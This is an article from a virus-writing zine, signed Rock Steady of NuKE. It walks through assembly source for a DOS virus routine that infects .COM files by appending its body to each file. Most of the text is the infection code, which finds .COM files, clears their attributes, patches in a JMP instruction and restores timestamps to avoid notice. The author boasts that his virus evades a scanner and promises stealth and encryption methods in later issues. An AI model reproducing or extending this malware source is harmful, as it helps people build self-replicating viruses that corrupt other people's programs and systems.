Constructing Kit on
Infecting .COM
By: Rocky Steady / NuKE
Well I must state my opinion that there are certainly WAY too many Overwriting Viruses out here. To help put a Stop to this I will try to explain to you a SIMPLE way to infect COM files at the END of the Program. This routine WORKS if you follow my steps correctly, and I've already used this in my `ParaSite ][' Virus.
Anyhow this is a brief description what the ASM Source will do.
Beginning...
;----------------------------------------------------------------------
; The Simple routine to Search for a .COM File...
;----------------------------------------------------------------------
com_files db "*.com",0
mov ah,4eh ;point to a *.COM file...
mov dx,com_files
mov cx,3 ;Attributes with ReadOnly or Hidden
int 21h ;is A okay...
cmp ax,12h ;Any files found?
je exit ;If no Files found Exit...
jmp found_file
; Instead of Exiting here you can make the Virus go and change dir and
; look for several other .com files else where... with the help of the
; path or simply searching for more <dir>...
found_file:
mov di,[si+file] ;di points to the filename
push si
add si,file ;si points to filename...
mov ax,offset 4300h ;get file Attributes...
mov dx,si ;filename in dx..
int 21h
mov file_attrib,cx ;Save file Attributes.
file dw 0
; Here we'll set the file attributes to nothing
mov ax,offset 4301h ;To set file Attributes...
mov cx,offset 0fffeh ;Set them to a Normal File
mov dx,si ;filename...
int 21h
mov ax,offset 3d02h ;Open File to Read/Write.
mov dx,si ;ASCIIZ filename
int 21h
jnb ok ;If file was open continue
jmp put_old_attrib ; error happened restore old attribs
; and quit.
ok:
mov bx,ax
mov ax,offset 5700h ;Get File Date & Time...
int 21h
mov old_time,cx ;Save old File Time...
mov old_date,dx ;Save old File Date
old_time db 0
old_date db 0
; here we infect the file... but first we SAVE the first 3 bytes
; somewhere in our virus
mov ah,3fh ;Read file...
mov cx,3 ;Number of bytes to read
mov dx,first_3 ;Save bytes in the buffer
add dx,si ;Filename...
int 21h
cmp ax,3 ;Where 3 bytes read?
jnz fix_file ;If not fix file like before and quit
first_3 equ $ ; The First three bytes of the Original File!
int 20h ; the virus is infected to.
nop
; This moves the File pointer to the END of the file
mov ax,offset 4202h
mov cx,0
mov dx,0
int 21h
mov cx,ax ;DX:AX is the FILESIZE!
sub ax,3 ;subtract three because of file pointer
add cx,offset c_len_y
mov di,si
sub di,offset c_len_x
mov [di],cx ;Modifies the 2nd & 3rd bytes of program
; The writes our virus to the file
mov ah,40h
mov cx,virlength ;Virus Length
mov dx,si ;File...
sub dx,offset codelength ;Length of virus codes.
int 21h
cmp ax,offset virlength ;all bytes written?
jnz fix_file ;If no fix file and quit
;Moves the file pointer to the beginning of file and write the
;3 bytes JMP at the beginning of the file
mov ax,offset 4200h
mov cx,0
mov dx,0
int 21h
mov ah,40h ;Write to file...
mov cx,3 ;# of bytes to write...
mov dx,si ;File name...
add dx,jump ;Point to the new JMP statement
int 21h
jump db 0e9h ;This is the JMP that will be put in the
;Begining of the file!
;Restore Old File Time & Date
fix_file:
mov dx,old_date ;Old File Date
mov cx,old_time ;Old file Time...
and cx,offset 0ffe0h ;Flat Attribs.
mov ax,offset 5701h
int 21h
mov ah,3eh
int 21h ;Close file...
; Here we'll restore the old file attributes...
put_old_attrib:
mov ax,offset 4301h
mov cx,old_att ;old File Attributes.
mov dx,si ;Filename...
int 21h
;----------------------------- EnD -------------------------------------
Anyhow that's it... Simple no? This source was also used in my ParaSite ][ Virus that is STILL undetectable to date with Scanv85. Anyhow I even made it MORE simpler than my real sources that have to play with the file paths.
Anyhow theres still work to be done, like you must restore the old data file so it will jump to 100h and run the old file the virus was infected too! Remember to store them in the beginning and then restore them! Anyhow there's a few Variables to be put in like `VirLength' which you should know how to do that also the `CodeLength' that is the VIRUS codes ONLY not counting the Stacks.
Anyhow This works FINE with a Non-Resident Virus. Because a few statements would have to be edited for TSRs. Anyhow try to use this, it's small neat and fast.
Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that infects COMs and EXEs to be released into the next issue! Though I just release this sources for you to LEARN! Rather than putting you name on my virus and releasing another strain on work I worked Hard upon! Anyhow I should release a SIMPLE new Virus source for all you programmers out there! And I will even explain a few Stealth Technics like how to hide your program in memory right under the TOM.
If there's Any Questions you want to know, please ask them I will answer them in the next [NukE] Releases... I may even release source codes on how to make an Algorithm Encryption method! I've developed one on my own, without the V2PX viruses sources... Anyhow it does the job and the formula I developed has an UNLIMITED amount of encryption methods! But since the virus codes have to be SMALL Like close to 2,000 bytes I will limit the formula to about 1,000 different combinations!
Rock Steady
NuKE / Viral Development Researcher
-PeAcE-